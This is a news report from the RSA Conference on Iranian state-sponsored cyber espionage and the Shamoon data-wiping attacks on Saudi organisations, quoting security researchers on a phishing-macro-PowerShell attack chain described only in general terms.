RSA CONFERENCE – San Francisco – As all eyes are on Russia's coordinated hacking and propaganda efforts aimed at influencing elections in the US and some European nations, state-sponsored attackers out of Iran are quietly cranking up their cyber spying and data-destruction attacks.
Most of Iran's targets over the past few months have been in the Middle East – namely its nemesis Saudi Arabia – but some security experts warn that the US indeed could be in the line of fire given the increasingly contentious geopolitical climate between the two nations.
Former national security advisor Michael Flynn's recent declaration that the US had put Iran "on notice" and subsequent anti-US protests and sentiment in Iran are the perfect recipe for an increase in cyber espionage and cyberattacks meant to destabilize or protest US policies on Iran, according to Adam Meyers, vice president of intelligence at CrowdStrike.
Meyers says Iran's nation-state hacking machine is more prolific than ever lately. "What's new is the level of activity we've seen, with dozens of targets in Saudi Arabia over the past two months," Meyers said in an interview here.
"One of the things we're tracking is if things escalate between the US and Iran, then we expect attacks will be likely in the financial sector" in the US in response, he said.
Iran's cyberattack operations also have matured and become more disciplined, he says. "They are showing more mature capabilities" and organization, Meyers explained. "In early 2010 to 2014, they were very open, disorganized, [as] small companies doing training and pen-testing and exploit development. Now they've aligned themselves into proper 'businesses" working on attack campaigns, he said. "We don't see them talking [about their cyber activities] as openly as before. That's notable."
In 2012, hackers believed to be out of Iran launched the devastating Shamoon data-wiping attacks on Middle East petroleum giant Saudi Aramco, damaging or wiping the hard drives of some 25,000 computers. The following year, US banks suffered a massive wave of distributed denial-of-service (DDoS) attacks that US officials blamed on Iran.
Then Shamoon reappeared in November of last year and again in January of this year, with a slightly new version of the destructive malware, hitting thousands of computers across more than 10 government and civil organizations in Saudi Arabia and the Gulf States.
IBM's X-Force incident response services team, IRIS (Incident Response and Intelligence Services), here this week, revealed its findings on just how the new Shamoon malware was unleashed on its victims, something that had been mostly speculated on for some time, given the nature of data-wiping attacks that leave little forensic evidence behind.
The latest Shamoon attacks began with a spear phishing email sent to employees at the organizations being targeted in the attacks. With those emails came a Microsoft Word document rigged with a malicious macro that when enabled by the victim, then infected his or her machine. That generates PowerShell and allows remote command-line control of the machine, allowing the attackers to add other malware, or gain privileged access to other systems on the victim's network.
Once the attackers have enough intel to find juicy targets on the network, they deploy Shamoon, which overwrites the hard drives and disables the affected computers.
Wendi Whitmore, global lead of IBM X-Force IRIS, said her team has mostly seen the new Shamoon campaign targeting Middle East organizations. "Right now, the biggest threat is really to the Middle East region, from what we've seen," she said in an interview here. IBM did not determine the initial attack vector of the 2012 Shamoon campaigns, she said.
Whitmore said she expects more Shamoon and destructive-type attacks to come. "Especially with how dynamic the political environment is now," she said.
Meanwhile, researchers from Palo Alto Networks Unit 42 team have spotted other targeted attacks on government, energy, and technology organizations mainly in Saudi Arabia or those that do business there. PAN calls the attack group "Magic Hound," noting that it may be somehow connected to the Iranian "Rocket Kitten" cyber espionage gang.
Unit 42 stopped short of tying these attacks to the Shamoon group. Rocket Kitten is best known for keylogging and other traditional cyber spying. Like the second Shamoon attacks, Magic Hound relies on malicious macros in Microsoft Office documents that call Windows PowerShell to wrest control of the victim machines.
"The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance," according to Unit 42's research. "The two legitimate websites we were able to identify were owned by organizations in the government and energy sectors. Based on the existence of these malicious files on the legitimate websites, it is highly probable that the websites had already been compromised in some fashion."
The initial attack vector was likely the old standby, spear phishing, according to the researchers.